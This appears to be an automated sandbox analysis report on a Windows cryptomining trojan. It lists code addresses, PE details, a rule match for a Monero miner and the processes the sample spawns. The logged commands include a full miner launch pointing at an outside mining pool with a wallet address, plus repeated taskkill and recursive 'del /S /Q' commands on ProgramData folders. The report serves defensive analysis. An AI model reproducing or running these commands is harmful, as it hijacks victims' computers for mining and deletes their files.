Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_065242D8	1_2_065242D8
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_065252E8	1_2_065252E8
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06520F50	1_2_06520F50
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06524B58	1_2_06524B58
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06522358	1_2_06522358
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06520F41	1_2_06520F41
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06522348	1_2_06522348
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06522778	1_2_06522778
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06522768	1_2_06522768
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06523BE1	1_2_06523BE1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06525020	1_2_06525020
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_065220F0	1_2_065220F0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06529491	1_2_06529491
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_0652949B	1_2_0652949B
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06526558	1_2_06526558
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06526548	1_2_06526548
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06522570	1_2_06522570
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06529515	1_2_06529515
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06522100	1_2_06522100
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_065271D0	1_2_065271D0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06528DD8	1_2_06528DD8
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_065271C1	1_2_065271C1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06522580	1_2_06522580
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_0845B2A8	1_2_0845B2A8
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_0845D108	1_2_0845D108
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_0845F5C8	1_2_0845F5C8
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_0845B998	1_2_0845B998
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_004064FB	5_2_004064FB
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_004065A4	5_2_004065A4
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_004180A0	5_2_004180A0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041E0B0	5_2_0041E0B0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_004401CA	5_2_004401CA
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0042B1BD	5_2_0042B1BD
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0044C200	5_2_0044C200
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0043A329	5_2_0043A329
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0042B3EF	5_2_0042B3EF
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00421380	5_2_00421380
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0044B480	5_2_0044B480
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0042E520	5_2_0042E520
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00445600	5_2_00445600
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041C860	5_2_0041C860
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041B8D0	5_2_0041B8D0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00418900	5_2_00418900
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00442B67	5_2_00442B67
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041EB64	5_2_0041EB64
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00445B80	5_2_00445B80
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00446C70	5_2_00446C70
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00442C87	5_2_00442C87
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00424D80	5_2_00424D80
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00421E30	5_2_00421E30
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00431E9B	5_2_00431E9B
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0042AF8B	5_2_0042AF8B
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC21FA	9_2_00BC21FA
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC0470	9_2_00BC0470
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC0FB0	9_2_00BC0FB0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC3138	9_2_00BC3138
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC182A	9_2_00BC182A
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BCBBE0	9_2_00BCBBE0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC2030	9_2_00BC2030
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC4070	9_2_00BC4070
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC4061	9_2_00BC4061
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC4ED8	9_2_00BC4ED8
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BCEF28	9_2_00BCEF28
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC0F0F	9_2_00BC0F0F
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC30E5	9_2_00BC30E5
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC31EE	9_2_00BC31EE
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC5290	9_2_00BC5290
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC5280	9_2_00BC5280
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC321E	9_2_00BC321E
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC3205	9_2_00BC3205
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC327C	9_2_00BC327C
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC54F0	9_2_00BC54F0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC5500	9_2_00BC5500
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC360C	9_2_00BC360C
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC5750	9_2_00BC5750
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BCBBD1	9_2_00BCBBD1
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_00BC1CF0	9_2_00BC1CF0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_07D8F5C8	9_2_07D8F5C8
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_07D8B2A8	9_2_07D8B2A8
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_07D8B998	9_2_07D8B998
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_07D8D108	9_2_07D8D108
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_004064FB	42_2_004064FB
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_004065A4	42_2_004065A4
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_004180A0	42_2_004180A0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041E0B0	42_2_0041E0B0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_004401CA	42_2_004401CA
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0042B1BD	42_2_0042B1BD
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0044C200	42_2_0044C200
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0043A329	42_2_0043A329
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0042B3EF	42_2_0042B3EF
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00421380	42_2_00421380
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0044B480	42_2_0044B480
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0042E520	42_2_0042E520
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00445600	42_2_00445600
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041C860	42_2_0041C860
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041B8D0	42_2_0041B8D0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00418900	42_2_00418900
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00442B67	42_2_00442B67
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041EB64	42_2_0041EB64
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00445B80	42_2_00445B80
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00446C70	42_2_00446C70
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00442C87	42_2_00442C87
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00424D80	42_2_00424D80
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00421E30	42_2_00421E30
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00431E9B	42_2_00431E9B
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0042AF8B	42_2_0042AF8B

Source: Datahub.exe.5.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\ProgramData\Data\Database.exe

Section loaded: nvcuda.dll

Source: Database.exe.5.dr

Static PE information: Number of sections : 15 > 10

Source: pj31M24DLn.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 12.0.Datahub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 12.2.Datahub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc

Source: C:\ProgramData\Microsoft Network\System.exe	Code function: String function: 00424410 appears 59 times
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: String function: 00424410 appears 59 times

Source: pj31M24DLn.exe	Binary or memory string: OriginalFilename vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000001.00000002.247771494.0000000002FD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSafeLsaPolicy.dllL vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000001.00000002.255273938.0000000009DE0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUInt16.dllZ vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000001.00000002.252719158.00000000083D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000001.00000000.224113759.0000000000A92000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConstructionLevelActivat.exe: vs pj31M24DLn.exe
Source: pj31M24DLn.exe	Binary or memory string: OriginalFilename vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000003.484792621.00000000013B0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamexmrig.exe, vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000002.502937028.00000000043D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCOMBASE.DLL.MUIj% vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000002.503536867.0000000004590000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000002.503536867.0000000004590000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000002.502815386.0000000004020000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000003.250715285.00000000012E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameConstructionLevelActivat.exe: vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000002.503427464.0000000004530000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000002.502882053.0000000004280000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000003.301894608.0000000001304000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamexmrig.7K vs pj31M24DLn.exe
Source: pj31M24DLn.exe, 00000005.00000002.502955928.00000000043E0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs pj31M24DLn.exe

Source: pj31M24DLn.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: System.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Database.exe.5.dr	Static PE information: Section: ZLIB complexity 0.998897017759
Source: Database.exe.5.dr	Static PE information: Section: ZLIB complexity 1.8
Source: Database.exe.5.dr	Static PE information: Section: ZLIB complexity 1.00689223058
Source: Database.exe.5.dr	Static PE information: Section: ZLIB complexity 1.04119850187
Source: Database.exe.5.dr	Static PE information: Section: .reloc ZLIB complexity 1.5

Source: pj31M24DLn.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pj31M24DLn.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pj31M24DLn.exe.log

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@527/21@6/3

Source: C:\Users\user\Desktop\pj31M24DLn.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Code function: 5_2_00406230 SHGetSpecialFolderPathW,GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,lstrcatW,CreateFileW,WriteFile,CloseHandle,CoInitializeEx,CoCreateInstance,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,

5_2_00406230

Source: pj31M24DLn.exe	Virustotal: Detection: 35%
Source: pj31M24DLn.exe	ReversingLabs: Detection: 32%

Source: C:\Users\user\Desktop\pj31M24DLn.exe

File read: C:\Users\user\Desktop\pj31M24DLn.exe

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\pj31M24DLn.exe 'C:\Users\user\Desktop\pj31M24DLn.exe'
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Users\user\Desktop\pj31M24DLn.exe C:\Users\user\Desktop\pj31M24DLn.exe
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\ProgramData\Data\Database.exe -epool eth.2miners.com:2020 -ewal 0x1bc6d72712986fDF33860e1e1B55C11000901350 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
Source: unknown	Process created: C:\ProgramData\Microsoft Network\System.exe 'C:\ProgramData\Microsoft Network\System.exe'
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\ProgramData\Systemd\Datahub.exe NULL
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\ProgramData\Data\Database.exe -epool eth.2miners.com:2020 -ewal 0x1bc6d72712986fDF33860e1e1B55C11000901350 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Systemd\Datahub.exe NULL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\ProgramData\Data\Database.exe -epool eth.2miners.com:2020 -ewal 0x1bc6d72712986fDF33860e1e1B55C11000901350 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Systemd\Datahub.exe NULL
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit
